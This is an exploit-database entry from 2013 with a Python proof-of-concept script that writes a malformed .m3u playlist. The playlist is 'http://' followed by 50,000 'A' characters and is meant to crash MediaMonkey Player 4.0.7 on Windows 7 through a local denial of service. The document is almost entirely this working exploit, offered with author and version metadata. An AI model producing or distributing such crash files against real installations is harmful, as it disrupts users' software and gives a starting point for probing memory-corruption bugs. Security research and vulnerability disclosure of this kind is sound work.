id: 20616
date: 04/07/2013
title: MediaMonkey Player v.4.0.7 Local Denial of Service
author: metacom
cves: 

#!/usr/bin/python
# Exploit Title:MediaMonkey Player Local Denial of Service poc
# Date: 04-04-2013
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.chip.de/downloads/MediaMonkey_18736381.html
# Version: MediaMonkey v.4.0.7
# Tested on: Windows 7 German

filename = "MediaMonkey-crash.m3u"

head = "http://"
junk ="\x41" * 50000

payload = head+junk+"\n"
textfile = open(filename , 'w')
textfile.write(payload)
textfile.close()

#  0day.today [2023-03-26]  #